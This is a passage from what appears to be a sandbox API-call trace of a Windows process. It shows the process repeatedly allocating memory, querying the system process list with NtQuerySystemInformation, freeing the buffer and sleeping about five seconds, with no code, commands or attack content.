Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.046] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.111] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.143] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.151] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.160] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.190] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 